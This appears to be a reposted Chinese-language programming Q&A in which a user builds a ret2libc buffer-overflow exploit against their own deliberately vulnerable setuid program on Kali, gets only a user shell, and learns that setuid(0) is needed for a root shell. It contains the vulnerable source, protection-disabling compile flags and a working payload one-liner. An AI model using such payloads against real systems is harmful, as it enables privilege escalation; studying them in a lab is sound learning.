如何解决我的缓冲区溢出漏洞利用只会打开常规用户外壳程序,而不会打开根外壳程序
我一直试图让这个非常简单的缓冲区溢出在我的本地kali机器上工作,并且经过大量的试验和错误之后,我终于理解为它执行我的shellcode并打开/ bin / bash shell-但是,它只是普通用户的shell(即我自己的“ kali”用户),而不是“ root” shell。非常令人失望!
我在SO上阅读了两个类似的(较旧的)问题,并尝试了所有建议(例如,确保可执行文件由root拥有,设置了+ s标志,不在nosuid挂载下, ASLR被禁用等),但没有任何运气。
这是易受攻击的程序的源代码:
kali@kali:~/Documents/buffer-overflow$ cat vulnerable.c
#include <stdio.h>
void vulnerableFunction()
{
char buffer[32];
printf("What's your name? ");
gets(buffer);
printf("Hello,%s!\n",buffer);
}
int main()
{
vulnerableFunction();
return 0;
}
这是我的编译方式:
kali@kali:~/Documents/buffer-overflow$ gcc vulnerable.c -m32 -o vulnerable-x86 -fno-stack-protector -z execstack -no-pie
vulnerable.c: In function ‘vulnerableFunction’:
vulnerable.c:8:5: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration]
8 | gets(buffer);
| ^~~~
| fgets
/usr/bin/ld: /tmp/ccAaIkz1.o: in function `vulnerableFunction':
vulnerable.c:(.text+0x2c): warning: the `gets' function is dangerous and should not be used.
以下是可执行文件的权限:
kali@kali:~/Documents/buffer-overflow$ sudo chown root:root ./vulnerable-x86
kali@kali:~/Documents/buffer-overflow$ sudo chmod +s ./vulnerable-x86
kali@kali:~/Documents/buffer-overflow$ ll ./vulnerable-x86
-rwsr-sr-x 1 root root 15408 Oct 5 13:51 ./vulnerable-x86
这里的ASLR被禁用(afaik):
kali@kali:~/Documents/buffer-overflow$ cat /proc/sys/kernel/randomize_va_space
0
这是有效负载以及我如何注入有效负载(3个内存地址指向libc中的system(),/ bin / sh和exit()函数):
kali@kali:~/Documents/buffer-overflow$ python -c "import struct; print ('A' * 44) + struct.pack('<I',0xf7e07070) + struct.pack('<I',0xf7df99c0) + struct.pack('<I',0xf7f4e33c)" > payload
kali@kali:~/Documents/buffer-overflow$ cat payload - | ./vulnerable-x86
这是结果(“ whoami”和“ echo $ 0”都是我手动键入的命令):
What's your name? Hello,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApp������<���!
whoami
kali
echo $0
/bin/sh
这似乎是成功生成的新外壳程序(因为我需要两次键入exit才能返回到正常的外壳程序),但它不是 根。
仅供参考-这些是我的nosuid坐骑:
kali@kali:/home$ sudo cat /proc/mounts | grep nosuid
sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0
proc /proc proc rw,relatime 0 0
udev /dev devtmpfs rw,relatime,size=4044272k,nr_inodes=1011068,mode=755 0 0
devpts /dev/pts devpts rw,gid=5,mode=620,ptmxmode=000 0 0
tmpfs /run tmpfs rw,size=815504k,mode=755 0 0
securityfs /sys/kernel/security securityfs rw,relatime 0 0
tmpfs /dev/shm tmpfs rw,nodev 0 0
tmpfs /run/lock tmpfs rw,size=5120k 0 0
tmpfs /sys/fs/cgroup tmpfs ro,size=4096k,nr_inodes=1024,mode=755 0 0
cgroup2 /sys/fs/cgroup/unified cgroup2 rw,nsdelegate 0 0
cgroup /sys/fs/cgroup/systemd cgroup rw,xattr,name=systemd 0 0
pstore /sys/fs/pstore pstore rw,relatime 0 0
none /sys/fs/bpf bpf rw,mode=700 0 0
cgroup /sys/fs/cgroup/freezer cgroup rw,freezer 0 0
cgroup /sys/fs/cgroup/devices cgroup rw,devices 0 0
cgroup /sys/fs/cgroup/rdma cgroup rw,rdma 0 0
cgroup /sys/fs/cgroup/cpu,cpuacct cgroup rw,cpu,cpuacct 0 0
cgroup /sys/fs/cgroup/net_cls,net_prio cgroup rw,net_cls,net_prio 0 0
cgroup /sys/fs/cgroup/cpuset cgroup rw,cpuset 0 0
cgroup /sys/fs/cgroup/blkio cgroup rw,blkio 0 0
cgroup /sys/fs/cgroup/memory cgroup rw,memory 0 0
cgroup /sys/fs/cgroup/perf_event cgroup rw,perf_event 0 0
cgroup /sys/fs/cgroup/pids cgroup rw,pids 0 0
mqueue /dev/mqueue mqueue rw,relatime 0 0
tracefs /sys/kernel/tracing tracefs rw,relatime 0 0
debugfs /sys/kernel/debug debugfs rw,relatime 0 0
binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,relatime 0 0
tmpfs /run/user/1000 tmpfs rw,size=815500k,nr_inodes=203875,mode=700,uid=1000,gid=1000 0 0
gvfsd-fuse /run/user/1000/gvfs fuse.gvfsd-fuse rw,user_id=1000,group_id=1000 0 0
任何想法都将受到欢迎,因为我觉得几个小时前已经用尽了很多东西:(
谢谢!
解决方法
当程序的可执行文件具有setuid位时,将使用原始用户的UID和文件所有者的EUID运行该程序。这意味着,直到程序执行setuid(0)
,它才会获得实际的root特权(UID = 0),并且将以普通用户身份运行。特别是,其子进程将不会以root用户身份运行。
因此,您必须修改易受攻击的程序以运行setuid(0)
,或将等效的系统调用添加到Shell代码有效负载中,以获取根Shell。
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。